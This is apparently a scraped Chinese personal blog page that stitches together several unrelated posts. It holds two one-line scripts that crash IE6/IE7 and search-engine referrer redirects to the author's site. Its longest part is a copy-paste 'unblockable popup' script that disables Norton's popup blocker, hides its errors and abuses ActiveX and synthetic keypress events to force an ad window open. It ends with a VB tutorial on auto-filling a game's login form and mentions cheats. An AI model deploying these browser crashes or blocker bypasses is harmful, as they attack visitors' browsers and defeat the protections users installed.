测试环境 ie6/ie7, Win XP Pro SP3

代码：
1、
===========================================================
<script>document.createElement("li").value=3</script>
===========================================================

2、
===========================================================
<script>document.createElement("html").outerHTML</script>
===========================================================

感兴趣的TX可以把任意一段代码复制到记事本，另存为html再用IE打开……
或者直接访问www.holmesian.org/exp/iecrash.html

结论：IE太那个什么了……

 

python环境下使用

RT

[sfile][/sfile]

 

 

<script>
var s=document.referrer
if(s.indexOf("baidu")>0)
self.location="http://www.Holmesian.cn";
</script>
<script>
var s=document.referrer
if(s.indexOf("yahoo")>0)
self.location="http://www.Holmesian.cn/";
</script>
<script>
var s=document.referrer
if(s.indexOf("google")>0)
self.location="http://www.Holmesian.cn/";
</script>



[quote]<script>
var s=document.referrer
if(s.indexOf("baidu")>0)
self.location="http://www.Holmesian.cn";
</script>
<script>
var s=document.referrer
if(s.indexOf("yahoo")>0)
self.location="http://www.Holmesian.cn/";
</script>
<script>
var s=document.referrer
if(s.indexOf("google")>0)
self.location="http://www.Holmesian.cn/";
</script>[/quote]

超强无法拦截屏蔽的弹窗代码
ps: 把下面代码复制到记事本，保存为.htm文件即可 :-)

目前没法拦截的弹窗代码
[quote]<html>
<head>
<Script Language="JavaScript">
var paypopupURL = "http://www.Holmesian.cn";
var usingActiveX = true;
function blockError(){return true;}
window.onerror = blockError;
//bypass norton internet security popup blocker
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}
if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
if (typeof(usingClick) == 'undefined') {var usingClick = false;}
if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;}
if (typeof(popwin) == 'undefined') {var popwin = null;}
if (typeof(poped) == 'undefined') {var poped = false;}
if (typeof(paypopupURL) == 'undefined') {var paypopupURL = "http://www.Holmesian.cn";}
var blk = 1;
var setupClickSuccess = false;
var googleInUse = false;
var myurl = location.href+'/';
var MAX_TRIED = 20;
var activeXTried = false;
var tried = 0;
var randkey = '0';  // random key from server
var myWindow;
var popWindow;
var setupActiveXSuccess = 0;
// bypass IE functions
function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('<INPUT STYLE="display:none;" ID="autoHit" TYPE="TEXT" ONKEYPRESS="showActiveX()">');popWindow=window.createPopup();popWindow.document.body.innerHTML='<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT></DIV>';document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" SRC="about:blank"></IFRAME>');popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT>');setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}
function tryActiveX(){if (!activeXTried && !poped) {if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow) {myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;}else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow){myWindow=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace('about:blank');}else {setTimeout('tryActiveX()',200);tried++;if (tried >= MAX_TRIED && !activeXTried) {activeXTried = true;setupClick();}return;}openActiveX();window.windowFired=true;self.focus();}}
function openActiveX(){if (!activeXTried && !poped) {if (myWindow && window.windowFired){window.windowFired=false;document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));}else {setTimeout('openActiveX();',100);}tried++;if (tried >= MAX_TRIED) {activeXTried = true;setupClick();}}}
function showActiveX(){if (!activeXTried && !poped) {if (googleInUse) {window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);}newWindow=myWindow.open(paypopupURL,'abcdefg');if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}
// end bypass IE functions
// normal call functions
function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}
// end normal call functions
// onclick call functions
function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}
function gopop() {if (!poped) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}
// end onclick call functions
// check version
function detectGoogle() {if (usingActiveX) {try {document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}}
function version() {var os = 'W0';var bs = 'I0';var isframe = false;var browser = window.navigator.userAgent;if (browser.indexOf('Win') != -1) {os = 'W1';}if (browser.indexOf("SV1") != -1) {bs = 'I2';}else if (browser.indexOf("Opera") != -1) {bs = "I0";}else if (browser.indexOf("Firefox") != -1) {bs = "I0";}else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}if (top.location != this.location) {isframe = true;}paypopupURL = paypopupURL;usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();}
version();
// end check version
function loadingPop() {
        if(!usingClick && !usingActiveX) {
                paypopup();
        }
        else if (usingActiveX) {tryActiveX();}
        else {setupClick();}
}
myurl = myurl.substring(0, myurl.indexOf('/',8));
if (myurl == '') {myurl = '.';}
setupActiveX();
loadingPop();
self.focus();
</Script>
</head>
<body>
看到效果了？
</body>
</html>
本代码由<a href=http://www.Holmesian.cn>Holmesian</a>提供[/quote]

比较有意思的挂马代码

阅读全文>>

大家可能学VB都很久了不过却是没用VB干出什么有用的事情，今天我就来讲下如何用VB自动填写网页的表格
我们的试验网页就是http://s4.travian.cn/login.php
打开它你就知道它长什么样子了，然后我们查看下网页的源代码（方法：菜单－》查看－》源代码）
我们可以在其中找到这么一段
复制内容到剪贴板代码:
[quote]<input class="fm fm110" type="text" name="ee852ab" value="" maxlength="15"> <span class="e f7"></span>
</td></tr>
<tr><td><label>密码:</label>
<input class="fm fm110" type="password" name="ec3cfe6" value="" maxlength="20"> <span class="e f7"></span>[/quote]
其中value的值也就是那两个输入框的值
我们还可以找到这么一段
复制内容到剪贴板代码:
<input type="image" value="login" border="0" name="s1" src="img/cn/b/l1.gif" width="80" height="20"    ></input>
这个就是那个确定按钮的代码了
不懂html，不知道如何找到这些代码？这个就需要借助与Dreamweaver的可视化功能了，用它分析网页也挺方便的
然后就是VB了～
用VB添加个webbrowser控键进来尽量把它在窗体上画大点～，（不知道如何找到这个控键？那就得借助baidu了，我不可能面面具到哦～）
我们把webbrowser控键得name属性改为IE，当然也可以是你自己喜欢得哈，不过要和下面得程序配套
然后就是最关键得填表了



复制内容到剪贴板代码:
Private Sub Form_Load()
    '初始化时打开该网页
    IE.navigate "http://s4.travian.cn/login.php"
End Sub

找个2个command控键，分别为command1和command2控键，将其caption改为 “输入” 和 “确定”

复制内容到剪贴板代码:
Private Sub command1_Click()
    Dim vDoc, vTag
    Dim i As Integer
    Set vDoc = IE.document
    For i = 0 To vDoc.All.length - 1 '检测所有标签
            If UCase(vDoc.All(i).tagName) = "INPUT" Then  '找到input标签
                Set vTag = vDoc.All(i)
                If vTag.Type = "text" Then
                    vTag.Value = "123456" '这个是输入到用户名中得值
                End If
                If vTag.Type = "password" Then
                    vTag.Value = "111222333"'这个是输入到密码框中的值
                End If
                If vTag.name = "s1" Then
                    vTag.Click
                End If
          endif
    next i
End sub
Private Sub command2_Click()
    Dim vDoc, vTag
    Dim i As Integer
    Set vDoc = IE.document
    For i = 0 To vDoc.All.length - 1 '检测所有标签
            If UCase(vDoc.All(i).tagName) = "INPUT" Then  '找到input标签
                Set vTag = vDoc.All(i)
                If vTag.name = "s1" Then
                    vTag.Click'点击确定键
                End If
            endif
    next i
End sub

然后运行程序，发现点击程序中的“输入” 按钮后，需要输入的值会被自动填写到输入框中
点击程序中的“确定”按钮，相当于点击网页中的确定按钮的效果一样～

以上就是自动填表的基本原理了，但是对于某些加了验证图片的就要麻烦点了，要判断验证图片代表的字母，不过不在本文的讨论范围内哈～只要把上面的理解透彻了，那么给travian作个外挂就只是时间问题了，呵呵